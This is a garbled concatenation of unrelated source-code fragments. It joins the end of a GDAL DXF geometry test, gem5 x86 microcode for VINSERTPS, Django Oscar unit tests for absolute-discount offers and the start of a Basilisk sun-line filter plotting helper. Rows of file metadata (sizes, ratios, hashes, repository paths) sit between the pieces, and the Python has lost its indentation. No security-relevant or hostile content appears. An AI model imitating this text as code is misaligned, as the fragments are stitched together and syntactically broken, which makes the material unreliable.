if ogrtest.check_feature_geometry(f, 'POLYGON Z ((47.6969600708475 60.0 15,47.6969600708475 0.0 15,46.1103652823066 -0.466958240734954 14.5010390223444,44.5309994192688 -0.919910449553494 14.0043514365868,42.9660914072371 -1.34485059453921 13.5122106346236,41.4228701717145 -1.72777264377568 13.0268900083519,39.9085646382042 -2.0546705653465 12.5506629496691,38.4304037322091 -2.31153832733525 12.0858028504722,36.9956163792324 -2.48436989782552 11.6345831026584,35.6114315047771 -2.55915924490089 11.1992770981251,34.2850780343463 -2.52190033664495 10.7821582287693,33.0237848934429 -2.3585871411413 10.3854998864882,31.8347810075701 -2.0552136264735 10.011575463179,30.725295302231 -1.59777376072516 9.66265835073903,29.7025567029285 -0.972261511979859 9.34102194106535,28.7737941351658 -0.164670848321179 9.04893962605519,27.9445456607789 0.835923776643351 8.78815304558283,27.2086691364137 2.01916842728349 8.55673058492536,26.5550905172208 3.36572402537053 8.35118961809371,25.9727183005027 4.85621968724478 8.1680420288596,25.450460983562 6.47128452924656 8.00379970099481,24.9772270637013 8.19154766771616 7.85497451827107,24.5419250382231 9.99763821899391 7.71807836446012,24.1334634044299 11.8701852994201 7.58962312333373,23.7407506596245 13.7898180253351 7.46612067866363,23.3526953011092 15.7371655130791 7.34408291422158,22.9582058261868 17.6928568789925 7.22002171377933,22.5461907321598 19.6375212394157 7.09044896110861,22.1055585163308 21.5517877106888 6.95187653998118,21.6252176760022 23.4162854091522 6.80081633416879,21.0940767084768 25.2116434511463 6.63378022744318,20.501044111057 26.9184909530113 6.44728010357611,19.8350283810455 28.5174570310876 6.23782784633932,19.0849380157448 29.9891708017154 6.00193533950455,18.2425220975445 31.3190096857923 5.73700778952582,17.3111586046656 32.5117898949509 5.44410752140743,16.2972009340528 33.5773013324584 5.12523258605305,15.2070024839932 34.5253339038266 4.7823810347885,14.046916652774 35.3656775145671 4.41755091893963,12.8232968386826 36.1081220701913 4.0327402898323,11.5424964400062 36.7624574762111 3.62994719879235,10.2108688550319 37.338473638138 3.21116969714562,8.834767482047 37.8459604614835 2.77840583621797,7.42054571933875 38.2947078517594 2.33365366733523,5.97455696519436 38.6945057144772 1.87891124182326,4.50315461790106 39.0551439551486 1.41617661100791,3.01269207574607 39.3864124792851 0.947447826215011,1.50952273701662 39.6981011923983 0.474722938770421,0 40 0,-0.0 40.0 -2.12999999999989e-15,47.6969600708475 60.0 15))') != 0:
gdaltest.post_reason( 'Wrong geometry on HATCH' )
f.DumpReadable()
return 'fail'
# Three MLINE objects
f = lyr.GetNextFeature()
if ogrtest.check_feature_geometry(f, 'MULTILINESTRING Z ((-3.92232270276368 270.388386486182 0,44.2014737139232 260.763627202844 0),(0 290 0,50 280 0),(50 280 0,54.2440667916678 280.848813358334 0),(66.6666666666666 283.333333333333 0,87.2937093466817 287.458741869336 0),(55.335512192016 260.671024384032 0,83.0445264186877 266.212827229366 0),(97.9166666666667 289.583333333333 0,150 300 0),(93.6674837386727 268.337418693363 0,122.93205511402 274.190332968433 0),(150 300 0,140 260 0),(122.93205511402 274.190332968433 0,120.597149997093 264.850712500727 0))') != 0:
gdaltest.post_reason( 'Wrong geometry on MLINE 1' )
f.DumpReadable()
return 'fail'
f = lyr.GetNextFeature()
if ogrtest.check_feature_geometry(f, 'MULTILINESTRING Z ((70 290 0,50 250 0),(61.0557280900008 294.472135955 0,41.0557280900008 254.472135955 0))') != 0:
gdaltest.post_reason( 'Wrong geometry on MLINE 2' )
f.DumpReadable()
return 'fail'
f = lyr.GetNextFeature()
if ogrtest.check_feature_geometry(f, 'MULTILINESTRING Z ((100 300 0,97.9166666666667 289.583333333333 0),(95.7739043877141 304.364619506534 0,92.6051880066742 288.521037601335 0),(91.5478087754281 308.729239013068 0,87.2937093466817 287.458741869336 0),(93.6674837386727 268.337418693363 0,90 250 0),(88.3560050786802 267.275122961365 0,83.7111464107331 244.050829621629 0),(83.0445264186877 266.212827229366 0,77.4222928214662 238.101659243259 0),(90 250 0,160 260 0),(83.7111464107331 244.050829621629 0,165.0 255.663522991525 0),(77.4222928214662 238.101659243259 0,170.0 251.327045983049 0),(160 260 0,160 310 0),(165.0 255.663522991525 0,165.0 315.902302108582 0),(170.0 251.327045983049 0,170.0 321.804604217164 0),(160 310 0,100 300 0),(165.0 315.902302108582 0,95.7739043877141 304.364619506534 0),(170.0 321.804604217164 0,91.5478087754281 308.729239013068 0))') != 0:
gdaltest.post_reason( 'Wrong geometry on MLINE 3' )
f.DumpReadable()
return 'fail'
# INSERT with rows/columns (MInsert)
minsert_attrib_style = 'LABEL(f:"Arial",t:"N",p:5,a:13,s:8g,w:120,dx:2.21818g,dy:4.61732g,c:#000000)'
f = lyr.GetNextFeature()
if ogrtest.check_feature_geometry(f, 'LINESTRING (57.7504894565613 50.7437006478524,69.4429302339842 53.4431132999787,71.6924407774228 43.6994126521264,60 41,57.7504894565613 50.7437006478524)') != 0:
gdaltest.post_reason( 'Wrong geometry on INSERT polyline 1' )
f.DumpReadable()
return 'fail'
f = lyr.GetNextFeature()
if ogrtest.check_feature_geometry(f, 'POINT Z (62.5032851270548 42.604233016948 0)') != 0 \
or f.GetStyleString() != minsert_attrib_style:
gdaltest.post_reason( 'Wrong geometry on INSERT attribute 1' )
f.DumpReadable()
return 'fail'
for x in range(2):
f = lyr.GetNextFeature()
f = lyr.GetNextFeature()
if ogrtest.check_feature_geometry(f, 'LINESTRING (116.212693343675 64.2407639084843,127.905134121098 66.9401765606106,130.154644664537 57.1964759127583,118.462203887114 54.4970632606319,116.212693343675 64.2407639084843)') != 0:
gdaltest.post_reason( 'Wrong geometry on INSERT polyline 3' )
f.DumpReadable()
return 'fail'
f = lyr.GetNextFeature()
if ogrtest.check_feature_geometry(f, 'POINT Z (120.965489014169 56.1012962775799 0)') != 0 \
or f.GetStyleString() != minsert_attrib_style:
gdaltest.post_reason( 'Wrong geometry on INSERT attribute 3' )
f.DumpReadable()
return 'fail'
for x in range(8):
f = lyr.GetNextFeature()
f = lyr.GetNextFeature()
if ogrtest.check_feature_geometry(f, 'LINESTRING (140.944774200355 90.4766968345049,152.637214977778 93.1761094866313,154.886725521217 83.4324088387789,143.194284743794 80.7329961866526,140.944774200355 90.4766968345049)') != 0:
gdaltest.post_reason( 'Wrong geometry on INSERT polyline 8' )
f.DumpReadable()
return 'fail'
f = lyr.GetNextFeature()
if ogrtest.check_feature_geometry(f, 'POINT Z (145.697569870849 82.3372292036006 0)') != 0 \
or f.GetStyleString() != minsert_attrib_style:
gdaltest.post_reason( 'Wrong geometry on INSERT attribute 8' )
f.DumpReadable()
return 'fail'
# Also throw in a test of a weird SPLINE generated by a certain CAD package
# with a knot vector that does not start at zero
f = lyr.GetNextFeature()
if ogrtest.check_feature_geometry(f, 'LINESTRING (0 20,0.513272464826192 19.8251653183892,1.00815682586353 19.629626397244,1.48499546839613 19.4132825350102,1.94413077770813 19.1760330301337,2.38590513908363 18.9177771810603,2.81066093780676 18.6384142862359,3.21874055916165 18.3378436441062,3.61048638843241 18.0159645531172,3.98624081090316 17.6726763117148,4.34634621185803 17.3078782183446,4.69114497658114 16.9214695714527,5.02097949035661 16.5133496694848,5.33619213846856 16.0834178108867,5.63712530620111 15.6315732941045,5.92412137883838 15.1577154175837,6.1975227416645 14.6617434797705,6.45767177996359 14.1435567791104,6.70491087901976 13.6030546140496,6.93958242411715 13.0401362830336,7.16202880053986 12.4547010845085,7.37259239357203 11.8466483169201,7.57161558849776 11.2158772787141,7.7594407706012 10.5622872683365,7.93641032516645 9.88577758423314,8.10286663747763 9.18624752484979,8.25915209281888 8.46359638863234,8.4056090764743 7.71772347402662,8.54257997372803 6.94852807947849,8.67040716986418 6.1559095034338,8.78943305016688 5.33976704433838,8.9 4.5)') != 0:
gdaltest.post_reason( 'Wrong geometry on SPLINE' )
f.DumpReadable()
return 'fail'
return 'success'
###############################################################################
# Test block base points
def ogr_dxf_53():
ds = ogr.Open('data/block-basepoint.dxf')
lyr = ds.GetLayer(0)
f = lyr.GetNextFeature()
if ogrtest.check_feature_geometry(f, 'MULTILINESTRING Z ((290 160 0,310 140 0),(310 160 0,290 140 0))') != 0:
gdaltest.post_reason( 'Wrong feature geometry' )
f.DumpReadable()
return 'fail'
return 'success'
###############################################################################
# cleanup
def ogr_dxf_cleanup():
gdaltest.dxf_layer = None
gdaltest.dxf_ds = None
return 'success'
###############################################################################
#
gdaltest_list = [
ogr_dxf_1,
ogr_dxf_2,
ogr_dxf_3,
ogr_dxf_4,
ogr_dxf_5,
ogr_dxf_6,
ogr_dxf_7,
ogr_dxf_8,
ogr_dxf_9,
ogr_dxf_10,
ogr_dxf_11,
ogr_dxf_12,
ogr_dxf_13,
ogr_dxf_14,
ogr_dxf_15,
ogr_dxf_16,
ogr_dxf_17,
ogr_dxf_18,
ogr_dxf_19,
ogr_dxf_20,
ogr_dxf_21,
ogr_dxf_22,
ogr_dxf_23,
ogr_dxf_24,
ogr_dxf_25,
ogr_dxf_26,
ogr_dxf_27,
ogr_dxf_28,
ogr_dxf_29,
ogr_dxf_30,
ogr_dxf_31,
ogr_dxf_32,
ogr_dxf_33,
ogr_dxf_34,
ogr_dxf_35,
ogr_dxf_36,
ogr_dxf_37,
ogr_dxf_38,
ogr_dxf_39,
ogr_dxf_40,
ogr_dxf_41,
ogr_dxf_42,
ogr_dxf_43,
ogr_dxf_44,
ogr_dxf_45,
ogr_dxf_46,
ogr_dxf_47,
ogr_dxf_48,
ogr_dxf_49,
ogr_dxf_50,
ogr_dxf_51,
ogr_dxf_52,
ogr_dxf_53,
ogr_dxf_cleanup ]
if __name__ == '__main__':
gdaltest.setup_run( 'ogr_dxf' )
gdaltest.run_tests( gdaltest_list )
gdaltest.summarize()
| 108.569123
| 3,873
| 0.773955
| 52,660
| 417,014
| 6.102754
| 0.115325
| 0.003834
| 0.002296
| 0.0205
| 0.85214
| 0.840241
| 0.828684
| 0.816536
| 0.806787
| 0.788575
| 0
| 0.676469
| 0.096846
| 417,014
| 3,840
| 3,874
| 108.597396
| 0.176814
| 0.333483
| 0
| 0.625211
| 0
| 0.080523
| 0.733671
| 0.368972
| 0
| 0
| 0
| 0.00026
| 0
| 1
| 0.022766
| false
| 0
| 0.002951
| 0
| 0.214587
| 0.013491
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
16a7de5bc41f871a82ae5b4377e5babb494b55c8
| 1,105
|
py
|
Python
|
src/arch/x86/isa/insts/simd512/floating_point/data_transfer/vinsertps.py
|
jyhuang91/gem5-avx
|
f988da46080f8db49beb39e20af437219f3aa4cb
|
[
"BSD-3-Clause"
] | 2
|
2021-01-15T17:32:18.000Z
|
2021-12-21T02:53:58.000Z
|
src/arch/x86/isa/insts/simd512/floating_point/data_transfer/vinsertps.py
|
jyhuang91/gem5-avx
|
f988da46080f8db49beb39e20af437219f3aa4cb
|
[
"BSD-3-Clause"
] | 3
|
2021-03-26T20:33:59.000Z
|
2022-01-24T22:54:03.000Z
|
src/arch/x86/isa/insts/simd512/floating_point/data_transfer/vinsertps.py
|
jyhuang91/gem5-avx
|
f988da46080f8db49beb39e20af437219f3aa4cb
|
[
"BSD-3-Clause"
] | 3
|
2021-03-27T16:36:19.000Z
|
2022-03-28T18:32:57.000Z
|
microcode = '''
def macroop VINSERTPS_XMM_XMM_I {
movfp ufp1, xmm0m, dataSize=8
movfp ufp2, xmm1m, dataSize=8
movfp xmm0, xmm0v, dataSize=8
movfp xmm1, xmm1v, dataSize=8
minsertpsl dest=xmm0, src1=ufp1, op2=ufp2, size=4, ext="(IMMEDIATE & 0xFF)"
minsertpsh dest=xmm1, src1=ufp1, op2=ufp2, size=4, ext="(IMMEDIATE & 0xFF)"
vclear dest=xmm2, destVL=16
};
def macroop VINSERTPS_XMM_M_I {
movfp xmm0, xmm0v, dataSize=8
movfp xmm1, xmm1v, dataSize=8
ldfp ufp1, seg, sib, "DISPLACEMENT + 0", dataSize=4
minsertpsl dest=xmm0, src1=ufp1, op2=ufp1, size=4, ext="(IMMEDIATE & 0x3F)"
minsertpsh dest=xmm1, src1=ufp1, op2=ufp1, size=4, ext="(IMMEDIATE & 0x3F)"
vclear dest=xmm2, destVL=16
};
def macroop VINSERTPS_XMM_P_I {
movfp xmm0, xmm0v, dataSize=8
movfp xmm1, xmm1v, dataSize=8
rdip t7
ldfp ufp1, seg, riprel, "DISPLACEMENT + 0", dataSize=4
minsertpsl dest=xmm0, src1=ufp1, op2=ufp1, size=4, ext="(IMMEDIATE & 0x3F)"
minsertpsh dest=xmm1, src1=ufp1, op2=ufp1, size=4, ext="(IMMEDIATE & 0x3F)"
vclear dest=xmm2, destVL=16
};
'''
| 34.53125
| 79
| 0.676018
| 164
| 1,105
| 4.5
| 0.256098
| 0.097561
| 0.089431
| 0.138211
| 0.837398
| 0.837398
| 0.788618
| 0.788618
| 0.788618
| 0.601626
| 0
| 0.095982
| 0.18914
| 1,105
| 32
| 80
| 34.53125
| 0.727679
| 0
| 0
| 0.571429
| 0
| 0.214286
| 0.982821
| 0
| 0
| 0
| 0.0217
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
16c91381ebf5fc1d75342359773895e258ab56c3
| 16,010
|
py
|
Python
|
tests/integration/offer/test_absolute_benefit.py
|
iicc/django-oscar
|
67ebe6bc21c242e9b0750b9f306b2f46a2758199
|
[
"BSD-3-Clause"
] | 2
|
2019-01-19T22:41:18.000Z
|
2019-01-21T05:47:23.000Z
|
tests/integration/offer/test_absolute_benefit.py
|
iicc/django-oscar
|
67ebe6bc21c242e9b0750b9f306b2f46a2758199
|
[
"BSD-3-Clause"
] | 10
|
2020-05-11T20:33:31.000Z
|
2022-03-12T00:24:28.000Z
|
tests/integration/offer/test_absolute_benefit.py
|
iicc/django-oscar
|
67ebe6bc21c242e9b0750b9f306b2f46a2758199
|
[
"BSD-3-Clause"
] | 3
|
2019-03-20T16:17:58.000Z
|
2022-02-25T09:38:38.000Z
|
from decimal import Decimal as D
from unittest import mock
from django.core.exceptions import ValidationError
from django.test import TestCase
from oscar.apps.offer import models
from oscar.apps.offer.utils import Applicator
from oscar.test.basket import add_product, add_products
from oscar.test import factories
class TestAnAbsoluteDiscountAppliedWithCountConditionOnDifferentRange(TestCase):
def setUp(self):
self.condition_product = factories.ProductFactory()
condition_range = factories.RangeFactory()
condition_range.add_product(self.condition_product)
self.condition = models.CountCondition.objects.create(
range=condition_range,
type=models.Condition.COUNT,
value=2)
self.benefit_product = factories.ProductFactory()
benefit_range = factories.RangeFactory()
benefit_range.add_product(self.benefit_product)
self.benefit = models.AbsoluteDiscountBenefit.objects.create(
range=benefit_range,
type=models.Benefit.FIXED,
value=D('3.00'))
self.offer = models.ConditionalOffer(
id=1, condition=self.condition, benefit=self.benefit)
self.basket = factories.create_basket(empty=True)
self.applicator = Applicator()
def test_succcessful_application_consumes_correctly(self):
add_product(self.basket, product=self.condition_product, quantity=2)
add_product(self.basket, product=self.benefit_product, quantity=1)
self.applicator.apply_offers(self.basket, [self.offer])
discounts = self.basket.offer_applications.offer_discounts
self.assertEqual(len(discounts), 1)
self.assertEqual(discounts[0]['freq'], 1)
def test_condition_is_consumed_correctly(self):
# Testing an error case reported on the mailing list
add_product(self.basket, product=self.condition_product, quantity=3)
add_product(self.basket, product=self.benefit_product, quantity=2)
self.applicator.apply_offers(self.basket, [self.offer])
discounts = self.basket.offer_applications.offer_discounts
self.assertEqual(len(discounts), 1)
self.assertEqual(discounts[0]['freq'], 1)
class TestAnAbsoluteDiscountAppliedWithCountCondition(TestCase):
def setUp(self):
range = models.Range.objects.create(
name="All products", includes_all_products=True)
self.condition = models.CountCondition.objects.create(
range=range,
type=models.Condition.COUNT,
value=2)
self.offer = mock.Mock()
self.benefit = models.AbsoluteDiscountBenefit.objects.create(
range=range,
type=models.Benefit.FIXED,
value=D('3.00'))
self.basket = factories.create_basket(empty=True)
def test_applies_correctly_to_empty_basket(self):
result = self.benefit.apply(self.basket, self.condition, self.offer)
self.assertEqual(D('0.00'), result.discount)
self.assertEqual(0, self.basket.num_items_with_discount)
self.assertEqual(0, self.basket.num_items_without_discount)
def test_applies_correctly_to_basket_which_matches_condition_with_one_line(self):
add_product(self.basket, price=D('12.00'), quantity=2)
result = self.benefit.apply(self.basket, self.condition, self.offer)
self.assertEqual(D('3.00'), result.discount)
self.assertEqual(2, self.basket.num_items_with_discount)
self.assertEqual(0, self.basket.num_items_without_discount)
# Check the discount is applied equally to each item in the line
line = self.basket.all_lines()[0]
prices = line.get_price_breakdown()
self.assertEqual(1, len(prices))
self.assertEqual(D('10.50'), prices[0][0])
def test_applies_correctly_to_basket_which_matches_condition_with_multiple_lines(self):
# Use a basket with 2 lines
add_products(self.basket, [
(D('12.00'), 1), (D('12.00'), 1)])
result = self.benefit.apply(self.basket, self.condition, self.offer)
self.assertTrue(result.is_successful)
self.assertFalse(result.is_final)
self.assertEqual(D('3.00'), result.discount)
self.assertEqual(2, self.basket.num_items_with_discount)
self.assertEqual(0, self.basket.num_items_without_discount)
# Check the discount is applied equally to each line
for line in self.basket.all_lines():
self.assertEqual(D('1.50'), line.discount_value)
def test_applies_correctly_to_basket_which_matches_condition_with_multiple_lines_and_lower_total_value(self):
# Use a basket with 2 lines
add_products(self.basket, [
(D('1.00'), 1), (D('1.50'), 1)])
result = self.benefit.apply(self.basket, self.condition, self.offer)
self.assertTrue(result.is_successful)
self.assertFalse(result.is_final)
self.assertEqual(D('2.50'), result.discount)
self.assertEqual(2, self.basket.num_items_with_discount)
self.assertEqual(0, self.basket.num_items_without_discount)
def test_applies_correctly_to_basket_which_exceeds_condition(self):
add_products(self.basket, [
(D('12.00'), 2), (D('10.00'), 2)])
result = self.benefit.apply(self.basket, self.condition, self.offer)
self.assertEqual(D('3.00'), result.discount)
self.assertEqual(4, self.basket.num_items_with_discount)
self.assertEqual(0, self.basket.num_items_without_discount)
def test_applies_correctly_to_basket_which_exceeds_condition_with_smaller_prices_than_discount(self):
add_products(self.basket, [
(D('2.00'), 2), (D('4.00'), 2)])
result = self.benefit.apply(self.basket, self.condition, self.offer)
self.assertEqual(D('3.00'), result.discount)
self.assertEqual(4, self.basket.num_items_with_discount)
self.assertEqual(0, self.basket.num_items_without_discount)
def test_applies_basket_exceeding_condition_smaller_prices_than_discount_higher_prices_first(self):
add_products(self.basket, [
(D('2.00'), 2), (D('4.00'), 2)])
result = self.benefit.apply(self.basket, self.condition, self.offer)
self.assertEqual(D('3.00'), result.discount)
self.assertEqual(4, self.basket.num_items_with_discount)
self.assertEqual(0, self.basket.num_items_without_discount)
class TestAnAbsoluteDiscount(TestCase):
def setUp(self):
range = models.Range.objects.create(
name="All products", includes_all_products=True)
self.condition = models.CountCondition.objects.create(
range=range,
type=models.Condition.COUNT,
value=2)
self.benefit = models.AbsoluteDiscountBenefit.objects.create(
range=range,
type=models.Benefit.FIXED,
value=D('4.00'))
self.offer = mock.Mock()
self.basket = factories.create_basket(empty=True)
def test_applies_correctly_when_discounts_need_rounding(self):
# Split discount across 3 lines
for price in [D('2.00'), D('2.00'), D('2.00')]:
add_product(self.basket, price)
result = self.benefit.apply(self.basket, self.condition, self.offer)
self.assertEqual(D('4.00'), result.discount)
# Check the discount is applied equally to each line
line_discounts = [line.discount_value for line in self.basket.all_lines()]
self.assertEqual(len(line_discounts), 3)
for i, v in enumerate([D('1.33'), D('1.33'), D('1.34')]):
self.assertEqual(line_discounts[i], v)
class TestAnAbsoluteDiscountWithMaxItemsSetAppliedWithCountCondition(TestCase):
def setUp(self):
range = models.Range.objects.create(
name="All products", includes_all_products=True)
self.condition = models.CountCondition.objects.create(
range=range,
type=models.Condition.COUNT,
value=2)
self.benefit = models.AbsoluteDiscountBenefit.objects.create(
range=range,
type=models.Benefit.FIXED,
value=D('3.00'),
max_affected_items=1)
self.offer = mock.Mock()
self.basket = factories.create_basket(empty=True)
def test_applies_correctly_to_empty_basket(self):
result = self.benefit.apply(self.basket, self.condition, self.offer)
self.assertEqual(D('0.00'), result.discount)
self.assertEqual(0, self.basket.num_items_with_discount)
self.assertEqual(0, self.basket.num_items_without_discount)
def test_applies_correctly_to_basket_which_matches_condition(self):
add_product(self.basket, D('12.00'), 2)
result = self.benefit.apply(self.basket, self.condition, self.offer)
self.assertEqual(D('3.00'), result.discount)
self.assertEqual(2, self.basket.num_items_with_discount)
self.assertEqual(0, self.basket.num_items_without_discount)
def test_applies_correctly_to_basket_which_exceeds_condition(self):
add_products(self.basket, [(D('12.00'), 2), (D('10.00'), 2)])
result = self.benefit.apply(self.basket, self.condition, self.offer)
self.assertEqual(D('3.00'), result.discount)
self.assertEqual(2, self.basket.num_items_with_discount)
self.assertEqual(2, self.basket.num_items_without_discount)
def test_applies_correctly_to_basket_which_exceeds_condition_but_with_smaller_prices_than_discount(self):
add_products(self.basket, [(D('2.00'), 2), (D('1.00'), 2)])
result = self.benefit.apply(self.basket, self.condition, self.offer)
self.assertEqual(D('1.00'), result.discount)
self.assertEqual(2, self.basket.num_items_with_discount)
self.assertEqual(2, self.basket.num_items_without_discount)
class TestAnAbsoluteDiscountAppliedWithValueCondition(TestCase):
def setUp(self):
range = models.Range.objects.create(
name="All products", includes_all_products=True)
self.condition = models.ValueCondition.objects.create(
range=range,
type=models.Condition.VALUE,
value=D('10.00'))
self.benefit = models.AbsoluteDiscountBenefit.objects.create(
range=range,
type=models.Benefit.FIXED,
value=D('3.00'))
self.offer = mock.Mock()
self.basket = factories.create_basket(empty=True)
def test_applies_correctly_to_empty_basket(self):
result = self.benefit.apply(self.basket, self.condition, self.offer)
self.assertEqual(D('0.00'), result.discount)
self.assertEqual(0, self.basket.num_items_with_discount)
self.assertEqual(0, self.basket.num_items_without_discount)
def test_applies_correctly_to_single_item_basket_which_matches_condition(self):
add_products(self.basket, [(D('10.00'), 1)])
result = self.benefit.apply(self.basket, self.condition, self.offer)
self.assertEqual(D('3.00'), result.discount)
self.assertEqual(1, self.basket.num_items_with_discount)
self.assertEqual(0, self.basket.num_items_without_discount)
def test_applies_correctly_to_multi_item_basket_which_matches_condition(self):
add_products(self.basket, [(D('5.00'), 2)])
result = self.benefit.apply(self.basket, self.condition, self.offer)
self.assertEqual(D('3.00'), result.discount)
self.assertEqual(2, self.basket.num_items_with_discount)
self.assertEqual(0, self.basket.num_items_without_discount)
def test_applies_correctly_to_multi_item_basket_which_exceeds_condition(self):
add_products(self.basket, [(D('4.00'), 3)])
result = self.benefit.apply(self.basket, self.condition, self.offer)
self.assertEqual(D('3.00'), result.discount)
self.assertEqual(3, self.basket.num_items_with_discount)
self.assertEqual(0, self.basket.num_items_without_discount)
def test_applies_correctly_to_multi_item_basket_which_exceeds_condition_but_matches_boundary(self):
add_products(self.basket, [(D('5.00'), 3)])
result = self.benefit.apply(self.basket, self.condition, self.offer)
self.assertEqual(D('3.00'), result.discount)
self.assertEqual(3, self.basket.num_items_with_discount)
self.assertEqual(0, self.basket.num_items_without_discount)
class TestAnAbsoluteDiscountWithMaxItemsSetAppliedWithValueCondition(TestCase):
def setUp(self):
range = models.Range.objects.create(
name="All products", includes_all_products=True)
self.condition = models.ValueCondition.objects.create(
range=range,
type=models.Condition.VALUE,
value=D('10.00'))
self.benefit = models.AbsoluteDiscountBenefit.objects.create(
range=range,
type=models.Benefit.FIXED,
value=D('3.00'),
max_affected_items=1)
self.offer = mock.Mock()
self.basket = factories.create_basket(empty=True)
def test_applies_correctly_to_empty_basket(self):
result = self.benefit.apply(self.basket, self.condition, self.offer)
self.assertEqual(D('0.00'), result.discount)
self.assertEqual(0, self.basket.num_items_with_discount)
self.assertEqual(0, self.basket.num_items_without_discount)
def test_applies_correctly_to_single_item_basket_which_matches_condition(self):
add_products(self.basket, [(D('10.00'), 1)])
result = self.benefit.apply(self.basket, self.condition, self.offer)
self.assertEqual(D('3.00'), result.discount)
self.assertEqual(1, self.basket.num_items_with_discount)
self.assertEqual(0, self.basket.num_items_without_discount)
def test_applies_correctly_to_multi_item_basket_which_matches_condition(self):
add_products(self.basket, [(D('5.00'), 2)])
result = self.benefit.apply(self.basket, self.condition, self.offer)
self.assertEqual(D('3.00'), result.discount)
self.assertEqual(2, self.basket.num_items_with_discount)
self.assertEqual(0, self.basket.num_items_without_discount)
def test_applies_correctly_to_multi_item_basket_which_exceeds_condition(self):
add_products(self.basket, [(D('4.00'), 3)])
result = self.benefit.apply(self.basket, self.condition, self.offer)
self.assertEqual(D('3.00'), result.discount)
self.assertEqual(3, self.basket.num_items_with_discount)
self.assertEqual(0, self.basket.num_items_without_discount)
def test_applies_correctly_to_multi_item_basket_which_exceeds_condition_but_matches_boundary(self):
add_products(self.basket, [(D('5.00'), 3)])
result = self.benefit.apply(self.basket, self.condition, self.offer)
self.assertEqual(D('3.00'), result.discount)
self.assertEqual(2, self.basket.num_items_with_discount)
self.assertEqual(1, self.basket.num_items_without_discount)
def test_applies_correctly_to_multi_item_basket_which_matches_condition_but_with_lower_prices_than_discount(self):
add_products(self.basket, [(D('2.00'), 6)])
result = self.benefit.apply(self.basket, self.condition, self.offer)
self.assertEqual(D('2.00'), result.discount)
self.assertEqual(5, self.basket.num_items_with_discount)
self.assertEqual(1, self.basket.num_items_without_discount)
class TestAnAbsoluteDiscountBenefit(TestCase):
def test_requires_a_benefit_value(self):
rng = models.Range.objects.create(
name="", includes_all_products=True)
benefit = models.Benefit(
type=models.Benefit.FIXED, range=rng
)
with self.assertRaises(ValidationError):
benefit.clean()
def test_requires_a_range(self):
benefit = models.Benefit(
type=models.Benefit.FIXED, value=10
)
with self.assertRaises(ValidationError):
benefit.clean()
| 45.742857
| 118
| 0.693754
| 2,019
| 16,010
| 5.283309
| 0.074294
| 0.096559
| 0.094872
| 0.074248
| 0.84663
| 0.832099
| 0.820287
| 0.797131
| 0.797131
| 0.764695
| 0
| 0.023315
| 0.193629
| 16,010
| 349
| 119
| 45.873926
| 0.802943
| 0.018551
| 0
| 0.733096
| 0
| 0
| 0.021458
| 0
| 0
| 0
| 0
| 0
| 0.291815
| 1
| 0.117438
| false
| 0
| 0.02847
| 0
| 0.170819
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
16da287c5d4dc947f243b61dfb399873da9c8570
| 26,133
|
py
|
Python
|
src/tests/scenarios/SunLineKF_test_utilities.py
|
ian-cooke/basilisk_mag
|
a8b1e37c31c1287549d6fd4d71fcaa35b6fc3f14
|
[
"0BSD"
] | null | null | null |
src/tests/scenarios/SunLineKF_test_utilities.py
|
ian-cooke/basilisk_mag
|
a8b1e37c31c1287549d6fd4d71fcaa35b6fc3f14
|
[
"0BSD"
] | 1
|
2019-03-13T20:52:22.000Z
|
2019-03-13T20:52:22.000Z
|
src/tests/scenarios/SunLineKF_test_utilities.py
|
ian-cooke/basilisk_mag
|
a8b1e37c31c1287549d6fd4d71fcaa35b6fc3f14
|
[
"0BSD"
] | null | null | null |
''' '''
'''
ISC License
Copyright (c) 2016, Autonomous Vehicle Systems Lab, University of Colorado at Boulder
Permission to use, copy, modify, and/or distribute this software for any
purpose with or without fee is hereby granted, provided that the above
copyright notice and this permission notice appear in all copies.
THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
'''
import sys, os, inspect
import numpy as np
from Basilisk.utilities import unitTestSupport
filename = inspect.getframeinfo(inspect.currentframe()).filename
path = os.path.dirname(os.path.abspath(__file__))
import matplotlib.pyplot as plt
def StateErrorCovarPlot(x, Pflat, FilterType, show_plots, saveFigures):
nstates = int(np.sqrt(len(Pflat[0,:])-1))
P = np.zeros([len(Pflat[:,0]),nstates,nstates])
t= np.zeros(len(Pflat[:,0]))
for i in range(len(Pflat[:,0])):
t[i] = x[i, 0]*1E-9
P[i,:,:] = Pflat[i,1:37].reshape([nstates,nstates])
for j in range(len(P[0,0,:])):
P[i,j,j] = np.sqrt(P[i,j,j])
if nstates == 6:
plt.figure(num=None, figsize=(10, 10), dpi=80, facecolor='w', edgecolor='k')
plt.subplot(321)
plt.plot(t , x[:, 1], "b", label='Error Filter')
plt.plot(t , 3 * np.sqrt(P[:, 0, 0]), 'r--', label='Covar Filter')
plt.plot(t , -3 * np.sqrt(P[:, 0, 0]), 'r--')
plt.legend(loc='best')
plt.ylabel('$d_x$(m)')
plt.title('First LOS component')
plt.grid()
